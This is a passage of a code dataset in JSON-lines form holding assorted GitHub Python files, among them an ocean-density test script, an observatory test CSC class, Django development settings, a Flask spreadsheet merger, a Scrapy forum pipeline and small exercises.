\n return denoised_out","repo_name":"gabbita-ss/Portfolio","sub_path":"BMX/denoise.py","file_name":"denoise.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73333577106","text":"from gamma_n import *\nimport scipy.io as sio\nfrom progress.bar import Bar\ndef nepbCTDExtract(fname):\n ctddata = sio.loadmat(fname)\n lats = np.asarray(ctddata[\"lat\"])[0]\n lons = np.asarray(ctddata[\"lon\"])[0]\n pres = np.asarray(ctddata[\"Pint\"]).T[0]\n sals = np.asarray(ctddata[\"Sint\"]).T\n thetas = np.asarray(ctddata[\"Tint\"]).T\n CT = np.asarray(ctddata[\"CT\"]).T\n SA = np.asarray(ctddata[\"Sint_abs\"]).T\n nspres = np.asarray(ctddata[\"P_gamma\"]).T\n PV = np.asarray(ctddata[\"PV\"]).T\n ns = np.asarray(ctddata[\"P_gref\"])\n profiles = []\n gammas = []\n for p in Bar(\"profile\").iter(range(int(len(lats)))):\n data = {}\n knownns = {}\n knownpv = {}\n if lats[p]>20 and lons[p]<0 or lons[p] > 170:\n data[\"lat\"]=lats[p]\n data[\"lon\"]=lons[p]\n data[\"temp\"]=[]\n data[\"sal\"]=[]\n data[\"pres\"]=[]\n for j in range(len(pres)-20):\n if ~np.isnan(sals[p][j]) and ~np.isnan(thetas[p][j]) and ~np.isnan(pres[j])\\\n and abs(pres[j]) < 10000 and abs(thetas[p][j])<30 and abs(sals[p][j])<50:\n insitutemp = thetas[p][j]\n practicalsal = sals[p][j]\n singlepres = abs(pres[j])\n abssal = gsw.SA_from_SP(practicalsal,singlepres,lons[p],lats[p])\n conservativetemp = gsw.CT_from_t(abssal,insitutemp,singlepres)\n if abs(abssal-SA[p][j]) > 0.001:\n print(\"saldiff = \",abssal-SA[p][j])\n if abs(conservativetemp-CT[p][j]) > 0.001:\n print(\"tempdiff = \",conservativetemp-CT[p][j])\n data[\"temp\"].append(insitutemp)\n data[\"sal\"].append(practicalsal)\n data[\"pres\"].append(singlepres)\n print(\"beep\")\n gamma,debug = gamma_n(data[\"sal\"],data[\"temp\"],data[\"pres\"],data[\"lon\"],data[\"lat\"])\n print(\"boop\")\n gammas.append(np.asarray(gamma))\n return np.asarray(gammas)\n\ngammas = nepbCTDExtract(\"testingdata/newnepbdata.mat\")\nplt.plot(gammas.T[0])\nplt.show()\n\n\n","repo_name":"garrettdreyfus/py-gamma-n","sub_path":"pygamma_n/testing/nepbtest.py","file_name":"nepbtest.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"28741803816","text":"__all__ = [\"TestCsc\", \"run_test_csc\"]\n\nimport asyncio\nimport string\nimport types\nimport typing\nfrom collections.abc import Sequence\n\nimport numpy as np\n\nfrom . import __version__, type_hints\nfrom .base_csc import State\nfrom .config_schema import CONFIG_SCHEMA\nfrom .configurable_csc import ConfigurableCsc\n\n\nclass TestCsc(ConfigurableCsc):\n \"\"\"A simple CSC intended for unit testing.\n\n Supported commands:\n\n * ``setScalars`` and ``setArrays``: output the provided data using the\n corresponding event and telemetry topics. Note that this violates\n the convention that telemetry is output at regular intervals,\n but it makes unit tests much easier to write.\n * ``wait``: wait for the specified amount of time, and, if requested,\n raise an exception. One use for this is to test command timeout\n by specifying a long wait and waiting a shorter time for the command\n to finish. Another use is to test multiple simultaneous commands,\n since ``wait`` supports this.\n * The standard state transition commands do the usual thing\n and output the ``summaryState`` event. 
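The gain estimate above is smoothed with `scipy.signal.savgol_filter(..., 1001, 3)`; the window length must be odd, no longer than the signal, and larger than the polynomial order. A smaller self-contained demo:

```python
import numpy as np
import scipy.signal as sgn

t = np.linspace(0, 1, 200)
noisy = np.sin(2 * np.pi * t) + np.random.normal(0, 0.2, t.size)
smooth = sgn.savgol_filter(noisy, window_length=51, polyorder=3)
print(smooth.shape)  # (200,) -- same length, high-frequency noise removed
```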
The ``exitControl``\n command shuts the CSC down.\n\n Parameters\n ----------\n index : `int`\n Index of Test component; each unit test method\n should use a different index.\n config_dir : `str`, optional\n Path to configuration files.\n check_if_duplicate : `bool`, optional\n Check for heartbeat events from the same SAL name and index\n at startup (before starting the heartbeat loop)?\n Defaults to False in order to speed up unit tests,\n but `amain` sets it true.\n initial_state : `salobj.State`, optional\n The initial state of the CSC. Typically one of:\n\n * `salobj.State.ENABLED` if you want the CSC immediately usable.\n * `salobj.State.STANDBY` if you want full emulation of a CSC.\n override : `str`, optional\n Configuration override file to apply if ``initial_state`` is\n `State.DISABLED` or `State.ENABLED`.\n simulation_mode : `int`, optional\n Simulation mode. The only allowed value is 0.\n\n\n Raises\n ------\n ValueError\n If ``config_dir`` is not a directory or ``initial_state`` is invalid.\n salobj.ExpectedError\n If ``simulation_mode`` is invalid.\n Note: you will only see this error if you await `start_task`.\n\n Notes\n -----\n Unlike a normal CSC this one does not output telemetry at regular\n intervals. Instead, in order to simplify unit tests, it outputs\n the ``arrays`` and ``scalars`` telemetry topics in reponse to\n the ``setArrays`` or ``setScalars`` command (just like the ``arrays``\n and ``scalars`` events). That makes it more predictable when this\n data will appear. Note that the ``heartbeat`` event is output at\n regular intervals, as for any CSC.\n\n Also, unlike most normal configurable CSCs, this one does not need to be\n configured in order to be used (though self.config will be None).\n Thus it is safe to start this CSC in the `salobj.State.ENABLED` state.\n\n **Error Codes**\n\n * 1: the fault command was executed\n \"\"\"\n\n enable_cmdline_state = True\n valid_simulation_modes = [0]\n version = __version__\n __test__ = False # Stop pytest from warning that this is not a test.\n\n def __init__(\n self,\n index: int,\n config_dir: type_hints.PathType | None = None,\n check_if_duplicate: bool = False,\n initial_state: State = State.STANDBY,\n override: str = \"\",\n simulation_mode: int = 0,\n ):\n super().__init__(\n name=\"Test\",\n index=index,\n config_schema=CONFIG_SCHEMA,\n config_dir=config_dir,\n check_if_duplicate=check_if_duplicate,\n initial_state=initial_state,\n override=override,\n simulation_mode=simulation_mode,\n )\n self.cmd_wait.allow_multiple_callbacks = True # type: ignore\n self.config: types.SimpleNamespace | None = None\n\n def as_dict(self, data: typing.Any, fields: Sequence[str]) -> dict[str, typing.Any]:\n \"\"\"Return the specified fields from a data struct as a dict.\n\n Parameters\n ----------\n data : `any`\n The data to copy.\n fields : `list` [`str`]\n The names of the fields of ``data`` to copy.\n \"\"\"\n ret = dict()\n for field in fields:\n ret[field] = getattr(data, field)\n return ret\n\n async def do_setArrays(self, data: type_hints.BaseMsgType) -> None:\n \"\"\"Execute the setArrays command.\"\"\"\n self.assert_enabled()\n self.log.info(\"executing setArrays\")\n data_dict = self.as_dict(data, self.arrays_fields)\n await self.evt_arrays.set_write(**data_dict) # type: ignore\n await self.tel_arrays.set_write(**data_dict) # type: ignore\n\n async def do_setScalars(self, data: type_hints.BaseMsgType) -> None:\n \"\"\"Execute the setScalars command.\"\"\"\n self.assert_enabled()\n self.log.info(\"executing 
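The `as_dict` method above is a generic attribute-to-dict copier. Its behavior on a plain namespace, for reference:

```python
import types

def as_dict(data, fields):
    # Mirrors TestCsc.as_dict: copy the named attributes into a dict.
    return {field: getattr(data, field) for field in fields}

msg = types.SimpleNamespace(int0=3, float0=1.5, string0='x')
print(as_dict(msg, ('int0', 'float0')))  # {'int0': 3, 'float0': 1.5}
```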
setScalars\")\n data_dict = self.as_dict(data, self.scalars_fields)\n await self.evt_scalars.set_write(**data_dict) # type: ignore\n await self.tel_scalars.set_write(**data_dict) # type: ignore\n\n async def do_fault(self, data: type_hints.BaseMsgType) -> None:\n \"\"\"Execute the fault command.\n\n Change the summary state to State.FAULT\n \"\"\"\n self.log.warning(\"executing the fault command\")\n await self.fault(code=1, report=\"executing the fault command\")\n\n async def do_wait(self, data: type_hints.BaseMsgType) -> None:\n \"\"\"Execute the wait command by waiting for the specified duration.\n\n If duration is negative then wait for abs(duration) but do not\n acknowledge the command as \"in progress\". This is useful for\n testing command timeout.\n \"\"\"\n self.assert_enabled()\n duration: float = data.duration # type: ignore\n if duration >= 0:\n await self.cmd_wait.ack_in_progress(data, timeout=duration) # type: ignore\n await asyncio.sleep(abs(duration))\n\n @property\n def field_type(self) -> dict[str, typing.Any]:\n \"\"\"Get a dict of field_name: element type.\"\"\"\n return dict(\n boolean0=bool,\n byte0=np.uint8,\n short0=np.int16,\n int0=np.int32,\n long0=np.int32,\n longLong0=np.int64,\n unsignedShort0=np.uint16,\n unsignedInt0=np.uint32,\n float0=np.single,\n double0=np.double,\n string0=str,\n )\n\n @property\n def arrays_fields(self) -> Sequence[str]:\n \"\"\"Get a tuple of the fields in an arrays struct.\"\"\"\n return (\n \"boolean0\",\n \"byte0\",\n \"short0\",\n \"int0\",\n \"long0\",\n \"longLong0\",\n \"unsignedShort0\",\n \"unsignedInt0\",\n \"float0\",\n \"double0\",\n )\n\n @property\n def scalars_fields(self) -> Sequence[str]:\n \"\"\"Get a tuple of the fields in a scalars struct.\"\"\"\n return (\n \"boolean0\",\n \"byte0\",\n \"short0\",\n \"int0\",\n \"long0\",\n \"longLong0\",\n \"unsignedShort0\",\n \"unsignedInt0\",\n \"float0\",\n \"double0\",\n \"string0\",\n )\n\n @property\n def int_fields(self) -> Sequence[str]:\n \"\"\"Get a tuple of the integer fields in a struct.\"\"\"\n return (\n \"byte0\",\n \"short0\",\n \"int0\",\n \"long0\",\n \"longLong0\",\n \"unsignedShort0\",\n \"unsignedInt0\",\n )\n\n def assert_arrays_equal(self, arrays1: typing.Any, arrays2: typing.Any) -> None:\n \"\"\"Assert that two arrays data structs are equal.\n\n The types need not match; each struct can be command, event\n or telemetry data, or a dict of field: value.\n \"\"\"\n # use reversed so boolean0 is not compared first,\n # as a discrepancy there is harder to interpret\n if isinstance(arrays1, dict):\n arrays1 = types.SimpleNamespace(**arrays1)\n if isinstance(arrays2, dict):\n arrays2 = types.SimpleNamespace(**arrays2)\n for field in reversed(self.arrays_fields):\n field_arr1 = getattr(arrays1, field)\n field_arr2 = getattr(arrays2, field)\n is_float = field in (\"float0\", \"double0\")\n if not np.array_equal( # type: ignore\n field_arr1, field_arr2, equal_nan=is_float\n ):\n raise AssertionError(\n f\"arrays1.{field} = {field_arr1} != {field_arr2} = arrays2.{field}\"\n )\n\n def assert_scalars_equal(self, scalars1: typing.Any, scalars2: typing.Any) -> None:\n \"\"\"Assert that two scalars data structs are equal.\n\n The types need not match; each struct can be command, event\n or telemetry data, or a dict of field: value.\n \"\"\"\n if isinstance(scalars1, dict):\n scalars1 = types.SimpleNamespace(**scalars1)\n if isinstance(scalars2, dict):\n scalars2 = types.SimpleNamespace(**scalars2)\n\n # use reversed so boolean0 is not compared first,\n # as a 
discrepancy there is harder to interpret\n for field in reversed(self.scalars_fields):\n field_val1 = getattr(scalars1, field)\n field_val2 = getattr(scalars2, field)\n is_float = field in (\"float0\", \"double0\")\n if not np.array_equal( # type: ignore\n field_val1, field_val2, equal_nan=is_float\n ):\n raise AssertionError(\n f\"scalars1.{field} = {field_val1} != {field_val2} = scalars2.{field}\"\n )\n\n def make_random_arrays_dict(self) -> dict[str, typing.Any]:\n \"\"\"Make a random arrays data dict.\"\"\"\n arrays_dict: dict[str, typing.Any] = dict()\n blank_arrays_data = self.evt_arrays.DataType() # type: ignore\n nelts = len(blank_arrays_data.boolean0)\n arrays_dict[\"boolean0\"] = np.random.choice([False, True], size=(nelts,))\n for field in self.int_fields:\n field_type = self.field_type[field]\n nelts = len(getattr(blank_arrays_data, field))\n iinfo = np.iinfo(field_type)\n arrays_dict[field] = np.random.randint(\n iinfo.min, iinfo.max, size=(nelts,), dtype=field_type\n )\n for field in (\"float0\", \"double0\"):\n field_type = self.field_type[field]\n nelts = len(getattr(blank_arrays_data, field))\n arrays_dict[field] = np.array(\n np.random.uniform(-1e5, 1e5, size=(nelts,)), dtype=field_type\n )\n return arrays_dict\n\n def make_random_scalars_dict(self) -> dict[str, typing.Any]:\n \"\"\"Make a random arrays data dict.\"\"\"\n scalars_dict: dict[str, typing.Any] = dict()\n scalars_dict[\"boolean0\"] = bool(np.random.choice([False, True]))\n printable_chars = [c for c in string.printable]\n scalars_dict[\"string0\"] = \"\".join(np.random.choice(printable_chars, size=(20,)))\n for field in self.int_fields:\n field_type = self.field_type[field]\n iinfo = np.iinfo(field_type)\n scalars_dict[field] = np.random.randint(\n iinfo.min, iinfo.max, dtype=field_type\n )\n for field in (\"float0\", \"double0\"):\n field_type = self.field_type[field]\n scalars_dict[field] = field_type(np.random.uniform(-1e5, 1e5))\n return scalars_dict\n\n @staticmethod\n def get_config_pkg() -> str:\n return \"ts_config_ocs\"\n\n async def configure(self, config: types.SimpleNamespace) -> None:\n self.config = config\n\n\ndef run_test_csc() -> None:\n \"\"\"Run the Test CSC from the command line.\"\"\"\n asyncio.run(TestCsc.amain(index=True))\n","repo_name":"lsst-ts/ts_salobj","sub_path":"python/lsst/ts/salobj/testcsc.py","file_name":"testcsc.py","file_ext":"py","file_size_in_byte":11993,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"3686597680","text":"info = {'other_info': {'a': 1, 'b': 2}, 'lst': ['c', 'd', 'e']}\nnew_info = {}\n\nfor key, value in info.items():\n if isinstance(value, dict): \n temp_dict = {}\n for key2, value2 in value.items():\n temp_dict[key2] = value2\n new_info[key] = temp_dict\n elif isinstance(value, list):\n temp_lst = []\n for key2, value2 in enumerate(value):\n temp_lst.append(value2)\n new_info[key] = temp_lst\n\nprint(info)\nprint('-' * 50)\nprint(new_info)\n\nprint('-' * 50)\nprint(id(info))\nprint(id(new_info))\n","repo_name":"prernaniraj/Python-Basics-Practice","sub_path":"shallow_copy_without_inbuilt_method.py","file_name":"shallow_copy_without_inbuilt_method.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"35274963712","text":"'''Development settings and globals.'''\n\nfrom .base import * # noqa F402\nimport os\n\n# -------------------------------------\n# DJANGO CONFIGURATION\n# 
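The equality asserts above pass `equal_nan=True` for float fields so NaN compares equal to NaN; `np.array_equal` grew that keyword in newer NumPy releases (a version assumption worth checking). A minimal demo:

```python
import numpy as np

a = np.array([1.0, np.nan])
b = np.array([1.0, np.nan])
print(np.array_equal(a, b))                  # False: NaN != NaN by default
print(np.array_equal(a, b, equal_nan=True))  # True
```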
-------------------------------------\n\n# Django Setup\n# =====================================\n\nALLOWED_HOSTS += ('docker.local', '.ngrok.io',) # noqa F405\nSECRET_KEY = env('SECRET_KEY', default='abcdefghijklmnopqrstuvwxyz') # noqa F405\n\nINSTALLED_APPS += ( # noqa F405\n 'debug_toolbar',\n 'storages',\n)\n\nMIDDLEWARE += ( # noqa F405\n 'debug_toolbar.middleware.DebugToolbarMiddleware',\n)\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'verbose': {\n 'format': '%(name)s %(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s'\n },\n 'simple': {\n 'format': '%(levelname)s %(asctime)s %(message)s'\n },\n },\n 'handlers': {\n 'stream': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n 'formatter': 'verbose',\n },\n 'applogfile': {\n 'level': 'DEBUG',\n 'class': 'logging.handlers.RotatingFileHandler',\n 'filename': os.path.join(LOG_DIR, 'mission.log'),\n 'maxBytes': 1024 * 1024 * 15, # 15MB\n 'backupCount': 10,\n 'formatter': 'verbose'\n },\n },\n 'loggers': {\n '': {\n 'handlers': ['stream', ],\n 'level': LOG_LEVEL, # noqa F405\n # 'propagate': False,\n },\n 'django.db': {\n 'handlers': ['stream', ],\n 'level': LOG_LEVEL, # noqa F405\n # 'propagate': False,\n },\n 'z.pool': {\n 'handlers': ['stream', ],\n 'level': LOG_LEVEL, # noqa F405\n # 'propagate': False,\n },\n 'django': {\n 'handlers': ['stream', ],\n 'level': LOG_LEVEL, # noqa F405\n # 'propagate': False,\n },\n 'mission': {\n 'handlers': ['applogfile',],\n 'level': 'DEBUG',\n },\n }\n}\n\nINTERNAL_IPS = ('127.0.0.1',)\n\n\ndef show_toolbar(request):\n return True\n\n\nDEBUG_TOOLBAR_CONFIG = {\n 'SHOW_TOOLBAR_CALLBACK': show_toolbar,\n}\n\n\nMEDIA_URL = env('REMOTE_MEDIA_URL', default='/uploads/') # noqa F405\n\n# -------------------------------------\n# VENDOR CONFIGURATION\n# -------------------------------------\n\n\n# -------------------------------------\n# HSTS\n# -------------------------------------\n# NOTE: This was breaking staging\n# SECURE_SSL_REDIRECT = False\n","repo_name":"umair-cd/mission","sub_path":"site/apps/config/settings/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11505744562","text":"def solution(keyinput, board):\n answer = [0,0]\n bw = board[0]//2\n bh = board[1]//2\n # loop over keyinput and update answer for every move\n # board is the map size; if a coordinate exceeds half the map size, it has to go back to the opposite bound\n for comm in keyinput:\n if comm == \"left\":\n answer[0] -= 1\n elif comm == \"right\":\n answer[0] += 1\n elif comm == \"up\":\n answer[1] += 1\n else:\n answer[1] -= 1\n \n if answer[0] > bw:\n answer[0] = bw\n elif answer[0] < -bw:\n answer[0] = -bw\n if answer[1] > bh:\n answer[1] = bh\n elif answer[1] < -bh:\n answer[1] = -bh\n \n return answer","repo_name":"muyaaho/python_coding","sub_path":"프로그래머스/lv0/120861. 
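The `applogfile` handler above is a size-rotated file log. The same handler configured imperatively, as a sketch (the path and logger name are illustrative):

```python
import logging
from logging.handlers import RotatingFileHandler

handler = RotatingFileHandler('mission.log',
                              maxBytes=1024 * 1024 * 15,  # 15MB, as above
                              backupCount=10)
handler.setFormatter(logging.Formatter('%(levelname)s %(asctime)s %(message)s'))
log = logging.getLogger('mission')
log.addHandler(handler)
log.setLevel(logging.DEBUG)
log.debug('rolls over after 15MB, keeping 10 backups')
```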
캐릭터의 좌표/캐릭터의 좌표.py","file_name":"캐릭터의 좌표.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21089579726","text":"# f1 file buffer\n# f2 file buffer\nimport pandas as pd\nfrom flask import Flask, request, render_template, make_response\nimport io\n\n\ndef read_file_csv(file):\n df = pd.read_csv(file, encoding='utf-16', sep='\\t')\n\n return df\n\n\ndef merge(f1, f2):\n # f1 and f2 are files recieved in Flask request.files\n # check the file type\n\n print('Check 0')\n print(f1.filename.split(\".\")[-1])\n print(f2.filename.split(\".\")[-1])\n\n if f1.filename.split(\".\")[-1] == \"csv\":\n df1 = read_file_csv(f1)\n\n print('Check 0.5')\n if f2.filename.split(\".\")[-1] == \"csv\":\n df2 = read_file_csv(f2)\n\n print('Check 1')\n\n # check for excel\n if f1.filename.split(\".\")[-1] == \"xlsx\" or f1.filename.split(\".\")[-1] == \"xls\":\n df1 = pd.read_excel(f1)\n if f2.filename.split(\".\")[-1] == \"xlsx\" or f2.filename.split(\".\")[-1] == \"xls\":\n df2 = pd.read_excel(f2)\n\n # merge the files\n df = pd.concat([df1, df2], axis=0, ignore_index=True)\n\n print(df1.columns)\n print(df2.columns)\n\n buffer = io.BytesIO()\n wtiter = pd.ExcelWriter(buffer)\n df.to_excel(wtiter, index=False)\n wtiter.close()\n\n buffer.seek(0)\n\n return buffer\n\n\n# make a flask endpoint\napp = Flask(__name__)\n\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef index():\n if request.method == \"POST\":\n f1 = request.files[\"f1\"]\n f2 = request.files[\"f2\"]\n # call the merge function\n merged_buffer = merge(f1, f2)\n\n response = make_response(merged_buffer)\n response.headers[\"Content-Type\"] = \"application/vnd.openxmlformats-officedocument.spreadsheetml.sheet\"\n response.headers[\"Content-Disposition\"] = \"attachment; filename=merged.xlsx\"\n\n return response\n\n return render_template(\"index.html\")\n\n# @app.route(\"/merge\", methods=[\"POST\"])\n# def merge_files():\n# f1 = request.files[\"f1\"]\n# f2 = request.files[\"f2\"]\n# # call the merge function\n# merged_buffer = merge(f1, f2)\n\n# response = make_response(merged_buffer)\n# response.headers[\"Content-Type\"] = \"application/vnd.openxmlformats-officedocument.spreadsheetml.sheet\"\n# response.headers[\"Content-Disposition\"] = \"attachment; filename=merged.xlsx\"\n\n# return response\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"PriyanshuSharma23/excel-merger","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7295751848","text":"from functools import *\r\n\r\n# filter(function, list) ==> returns the values if the operation result of them is true\r\nnums = [3, 2, 6, 8, 4, 6, 2, 9]\r\n\r\n'''\r\ndef is_even(n):\r\n return n % 2 == 0 # if true, return true to filter function, otherwise, return false to filter function\r\n'''\r\n\r\n# Check how many even numbers in the list `nums`\r\nevens = list(filter(lambda n: n % 2 == 0, nums)) # if true, it returns the numbers; if false, break.\r\nprint(evens) # [2, 6, 8, 4, 6, 2]\r\n\r\n# Map(function, list) ==> perform a change to the all elements of the list\r\n# we want now to double all values of the evens list\r\ndoubles = list(map(lambda a: a ** 2, evens))\r\nprint(doubles) # [4, 36, 64, 16, 36, 4]\r\n\r\n# reduce(function, sequence) ==>\r\n# Now, we want to add the values of doubles list\r\nsums = reduce(lambda a, b: a + 
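The coordinate solution above clamps `answer` to the board with chained if/elif; the same bound check reads as a one-liner:

```python
def clamp(value, low, high):
    # Equivalent to the if/elif bounds checks in solution() above.
    return max(low, min(high, value))

bw = 5
print(clamp(7, -bw, bw))   # 5
print(clamp(-9, -bw, bw))  # -5
```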
b, doubles)\r\nprint(sums) # 160\r\n","repo_name":"HendEmad/Coding","sub_path":"Python/Basics/Functions/Filter, Map, and Reduce.py","file_name":"Filter, Map, and Reduce.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18244294090","text":"import requests as r\r\n\r\nclass Sc:\r\n def Main():\r\n user = str(input(\"[Input Link] >_ \"))\r\n req = r.get(user)\r\n if req.status_code == 200:\r\n g = open(\"Result.html\", \"w+\")\r\n g.write(req.text)\r\n g.close()\r\n else:\r\n print(\"[!] Check Your Connection\")","repo_name":"FajarTheGGman/RoseKiller","sub_path":"content/sc.py","file_name":"sc.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"57362803","text":"from PyQt5.QtWidgets import QMessageBox\nfrom PyQt5.QtSql import QSqlDatabase, QSqlQuery, QSqlDriver, QSqlError\n\nfrom db.db_constant import DbConstant\nfrom util.log import Log\n\n\"\"\"\nThe QSqlQuery::exec() function returns a bool value that indicates if\nthe request has been successful. In your production code, always check\nthis value. You can further investigate the error\nwith QSqlQuery::lastError(). \n\"\"\"\n\n\nclass DbManager:\n\n def __init__(self):\n self._conn: QSqlDatabase = None\n self._driver: QSqlDriver = None\n\n def create(self) -> QSqlDatabase:\n \"\"\"\n\n :return:\n \"\"\"\n self._conn = QSqlDatabase.addDatabase(DbConstant.DB_TYPE)\n self._conn.setDatabaseName(DbConstant.DB_NAME)\n\n self._driver = self._conn.driver()\n Log.i(\"Database Driver: %s\" % self._conn.driverName())\n\n if not self._conn.open():\n QMessageBox.critical(None, \"Cannot open database\",\n \"Unable to establish a database connection.\\n\"\n \"This example needs SQLite support. 
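The `reduce(lambda a, b: a + b, ...)` call above is the textbook reduction; for plain addition the built-in `sum` is the idiomatic equivalent:

```python
from functools import reduce

doubles = [4, 36, 64, 16, 36, 4]
print(reduce(lambda a, b: a + b, doubles))  # 160
print(sum(doubles))                         # 160 -- same result, clearer intent
```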
Please read the Qt SQL \"\n \"driver documentation for information how to build it.\\n\\n\"\n \"Click Cancel to exit.\",\n QMessageBox.Cancel)\n return None\n Log.i(\"DB Connection established\")\n return self._conn\n\n def get_connection(self):\n if self._conn is None:\n self._conn = QSqlDatabase.addDatabase('QSQLITE')\n self._conn.setDatabaseName('docker.db')\n self._conn.open()\n return self._conn\n\n def get_api_versions(self):\n result = []\n query = QSqlQuery(self._conn)\n query.exec(\"select * from docker_av_api_version\")\n rec = query.record()\n while query.next():\n result.append({'name': query.value(rec.indexOf('av_name')),\n 'value': query.value(rec.indexOf('av_value'))})\n return result\n\n def close(self):\n if self._conn is not None:\n self._conn.close()\n\n def debug(self, query: QSqlQuery):\n if query.lastError().type() == QSqlError.NoError:\n print(\"Query OK: %s \" % query.lastQuery())\n else:\n print(\"Query Error: %s [%s]\" % (query.lastError().text(), query.lastQuery()))","repo_name":"jeanbritz/pyqt-docker-client","sub_path":"db/db_manager.py","file_name":"db_manager.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"72111024147","text":"# -*- coding:utf-8 -*-\n\nfrom random import randint\n\nx = randint(0,300)\ngo = 'y'\nwhile (go == 'y'):\n\tprint ('please input a number between 0~300:')\n\tdigit = int(input())\n\tif digit == x:\n\t\tprint ('Bingo!')\n\t\tbreak\n\telif digit > x:\n\t\tprint ('Too big, please try again.')\n\telse:\n\t\tprint ('Too small, please try again.')\n\tprint ('if you do not want to continue, input n, or input y')\n\tgo = input()\nelse:\n\tprint ('Goodbye!')\n","repo_name":"yang-hope/Python","sub_path":"Basics/guessnum.py","file_name":"guessnum.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38696891191","text":"\nfrom itemadapter import ItemAdapter\nfrom myproana.models import db_connect, create_table, Author, Thread, Subforum, Post, Authorinfo\nimport sqlalchemy.orm as orm\nfrom myproana.items import ThreadItem, PostItem\nfrom sqlalchemy import exc\n\n\nclass MyproanaPipeline:\n def __init__(self):\n \"\"\"\n Initializes database connection and sessionmaker\n Creates tables\n \"\"\"\n engine = db_connect()\n create_table(engine)\n self.Session = orm.sessionmaker(bind=engine)\n\n def process_item(self, item, spider):\n \"\"\"Save quotes in the database\n This method is called for every item pipeline component\n \"\"\"\n\n if isinstance(item, ThreadItem):\n self.process_thread(item, spider)\n if isinstance(item, PostItem):\n self.process_post(item, spider)\n\n def process_thread(self, item, spider):\n # Process thread data and prepare the model for db\n session = self.Session()\n thread = Thread()\n author = Author()\n subforum = Subforum()\n\n author.name = item[\"authorname\"]\n thread.title = item[\"threadtitle\"]\n thread.startdate = item[\"startdate\"]\n thread.url = item[\"url\"]\n subforum.name = item[\"subforumname\"]\n\n exist_author = session.query(Author).filter_by(name=author.name).first()\n if exist_author is not None: # the current author exists\n thread.author_id = exist_author.id\n else:\n thread.author = author\n\n exist_subforum = session.query(Subforum).filter_by(name=subforum.name).first()\n if exist_subforum is not None: # the current subforum exists\n thread.subforum_id = exist_subforum.id\n else:\n 
thread.subforum = subforum\n\n        try:\n            session.add(thread)\n            session.flush()\n            session.commit()\n        except:\n            session.rollback()\n            raise\n\n        finally:\n            session.close()\n\n        return item\n\n    def process_post(self, item, spider):\n        # Process post data and prepare the model for db\n        session = self.Session()\n        thread = Thread()\n        author = Author()\n        post = Post()\n        authorinfo = Authorinfo()\n\n        post.content = item[\"postcontent\"]\n        post.date = item[\"date\"]\n        post.sign = item[\"authorsign\"]\n        post.noposts = item[\"noposts\"]\n        author.name = item[\"authorname\"]\n        thread.title = item[\"threadtitle\"]\n        authorinfo.type = item[\"authortype\"]\n\n        authorinfo.author = author\n\n        exist_author = session.query(Author).filter_by(name=author.name).first()\n        if exist_author is not None:  # the current author exists\n            post.author_id = exist_author.id\n        else:\n            post.author = author\n\n        exist_thread = session.query(Thread).filter_by(title=thread.title).first()\n        post.thread_id = exist_thread.id\n\n\n        try:\n            session.add(post)\n            session.commit()\n        except:\n            session.rollback()\n            raise\n\n        finally:\n            session.close()\n\n        return item\n\n","repo_name":"saeedrahmo/myproana","sub_path":"myproana/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":3182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"7824950234","text":"from collections import Counter\n\nclass Solution(object):\n    def shortestCompletingWord(self, licensePlate, words):\n        \"\"\"\n        :type licensePlate: str\n        :type words: List[str]\n        :rtype: str\n        \"\"\"\n        licensePlate = \"\".join([x for x in licensePlate if x not in \" 1234567890\" ])\n        c = Counter(licensePlate.lower())\n        total = sum(c.values())\n        words = sorted(words, key=lambda x: len(x))\n        for w in words:\n            if len(w) < total:\n                continue\n            c2 = Counter(w.lower())\n            flag = 0\n            for k in c.keys():\n                if c2.get(k, 0) < c[k]:\n                    flag = 1\n                    break\n            if flag == 0:\n                return w\n\n\ns = Solution()\nprint(s.shortestCompletingWord(licensePlate = \"1s3 PSt\", words = [\"step\", \"steps\", \"stripe\", \"stepple\"]))","repo_name":"0as1s/leetcode","sub_path":"748_shortestCompletingWord.py","file_name":"748_shortestCompletingWord.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
